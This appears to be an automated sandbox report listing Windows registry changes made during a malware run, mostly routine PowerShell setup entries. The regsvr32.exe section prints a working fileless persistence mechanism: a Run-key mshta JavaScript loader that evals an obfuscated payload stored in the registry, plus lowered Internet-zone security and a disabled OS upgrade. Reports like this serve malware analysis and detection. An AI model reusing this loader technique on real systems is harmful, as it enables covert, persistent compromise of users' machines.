[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "68 EA A1 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:3256 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 30 42 55 C7 32 4A DE CB 09 CC C2 89 41 36 5E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "9C 45 3F 7D 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process PSCustomSetupUtil.exe:3892 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 0D 3E 3B E3 EC D6 D6 EA 9A 80 D8 33 CB 59 13"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "E0 58 9E 80 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:3844 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 44 B6 DB 7C E0 88 23 8C DB 97 F0 31 E0 D8 52"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "A0 0D 52 80 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:2872 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 A2 1D 39 4D 8D BB 94 B5 F1 C8 C6 18 26 86 D3"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "FA BB 8F 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:3768 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 55 AD 70 07 99 9B FC 7B 08 78 A0 51 E0 7D DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3936 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F F9 DB 44 1B AD 76 67 1C 9F F7 2B 63 EC 55 E5"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "80 7E C4 80 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3984 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 A2 2C AC EC F7 95 D6 D1 06 DC 18 81 67 1D 55"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "0C 05 0C 81 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:2972 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 85 95 2E 65 F6 BC 3D A0 AB 16 C5 AE B3 72 3F"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "8E F1 06 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:3284 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 1A 3B AB C6 4F 79 25 07 60 24 36 39 3E 47 91"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "D4 E1 5B 7D 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:3788 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 05 80 B2 05 16 C7 F0 76 1F B1 40 38 07 DC 80"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2896 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 80 63 A0 48 03 E1 E3 CF 52 35 CB 22 77 E4 10"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "9A E1 B5 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:3192 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC D7 86 48 7C 99 7B 9E D9 80 06 DE D2 A8 CB 84"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "2C 0D 06 7D 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process PSCustomSetupUtil.exe:3960 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 3D 2A 05 60 58 E5 2C 74 02 6A 67 04 72 96 43"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C6 41 E8 80 03 86 D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:2792 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 C3 DE B0 72 C8 AF 66 F6 69 85 AD 64 5B B5 A9"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "60 0E 41 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSSetupNativeUtils.exe:2068 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 84 B1 2F 8C 8E 15 51 5F 14 1C 4E DA 8E A5 C2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process regsvr32.exe:436 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:F5CnJkc=Z;E4O8=new ActiveXObject(WScript.Shell);tdD5EP4p=A3N7zU;oP2oz=E4O8.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);IHN4fCIOH=ppQTrm;eval(oP2oz);bV4nVps=EcUnA8zi;ï¡Š"

[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"

[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "875"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe"
"5232108f" = "¡¯… SñäÐôsÃ…8,¼‚Å;QpÅ’oëDôGfÊj/›&Â¥#YW°~ ýÉ¥´E/ôñÝÙln‹[^7Ù‰ÉåS¤Øl©Czæñ xˆí·uÛÓÉ„hµññKro“´®­„Ù,ÅÀ~‡ “LãŸE D´ÉAžR°ø7A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = "hT6WJTQLtVeoyUyVpkuBT=Q43rzyihkKzPviQoP0sTUSg7rhAuLOZ0L3PV33TKZxgXSD0mmazlHbYFKsBZfZgtHGpZqC38MAGvaOxtyueAe25nZBHWJNKarjZDaPzH4O7CNkqn6NYjoN5827nIDX1nkj5rxQgfRv;GjCvLMXxuZpjDMmf4FWj5gM=xIxppUbz299n74DhkBfxSdB0vcIfGUK9HkmrjPFicTb7wpfUhB2bMb1tbw82bgedDH4kG3KXVjlDeb6VquQARa9OcHqjy2LU3Fi9uCi;CgYrqBQ5rPIYLyZmhouI=nRKGcR8Q3kH2mTiiLKecaboSNPzTnhwjTBwkSZStqhZzzGrQk3IXRwrIRyv77Yb6VYE804sThr168fBYFkrpV3rQvyTe3bhRTDW2CtAeBKSvqYj52vyruM0vcCtInLl5iY;zobiwOtANPxgOzZ4Js=taG6s7wLQNorEjYCS47MKbAsV4eON8qO4p2vUyMMWO8Z93XRpFcLlTVn01gdlxZCwnY;LV39O=38140F18771E1F0E1E38241E33274515061D105F1A785C0D460351051D6E01555A3C06274B190F0B000F01142B66725D28237B5A303D5F3F1F3F411E580E59235B5570212D110136270B2D204429222F2B0E1E29380A187F2C0104543C365C012711160236210D020C255626763C04266E3F105E667A0F7857781D1C392603283D15231C460B053535073D01010B0C676103667119205D3421390E491C033A174A15747A2E280A392032240A140A3D1F7F4F12091900062A3501020A1126173277296A16321A6807070F1F427A0A40784374181F1F48221B00034B503E58764B1D1D301E103A7C3F503A0820224631381"
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"

[HKCU\Software\e307dfcb0a]
"f4ea4294" = "875"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\e307dfcb0a]
"5119f545" = "hT6WJTQLtVeoyUyVpkuBT=Q43rzyihkKzPviQoP0sTUSg7rhAuLOZ0L3PV33TKZxgXSD0mmazlHbYFKsBZfZgtHGpZqC38MAGvaOxtyueAe25nZBHWJNKarjZDaPzH4O7CNkqn6NYjoN5827nIDX1nkj5rxQgfRv;GjCvLMXxuZpjDMmf4FWj5gM=xIxppUbz299n74DhkBfxSdB0vcIfGUK9HkmrjPFicTb7wpfUhB2bMb1tbw82bgedDH4kG3KXVjlDeb6VquQARa9OcHqjy2LU3Fi9uCi;CgYrqBQ5rPIYLyZmhouI=nRKGcR8Q3kH2mTiiLKecaboSNPzTnhwjTBwkSZStqhZzzGrQk3IXRwrIRyv77Yb6VYE804sThr168fBYFkrpV3rQvyTe3bhRTDW2CtAeBKSvqYj52vyruM0vcCtInLl5iY;zobiwOtANPxgOzZ4Js=taG6s7wLQNorEjYCS47MKbAsV4eON8qO4p2vUyMMWO8Z93XRpFcLlTVn01gdlxZCwnY;LV39O=38140F18771E1F0E1E38241E33274515061D105F1A785C0D460351051D6E01555A3C06274B190F0B000F01142B66725D28237B5A303D5F3F1F3F411E580E59235B5570212D110136270B2D204429222F2B0E1E29380A187F2C0104543C365C012711160236210D020C255626763C04266E3F105E667A0F7857781D1C392603283D15231C460B053535073D01010B0C676103667119205D3421390E491C033A174A15747A2E280A392032240A140A3D1F7F4F12091900062A3501020A1126173277296A16321A6807070F1F427A0A40784374181F1F48221B00034B503E58764B1D1D301E103A7C3F503A0820224631381"
"0494a3ce" = "1458847728"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 AF C0 E0 26 CB 41 E4 D6 DA 9C A9 3E 3E B9 B5"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\e307dfcb0a]
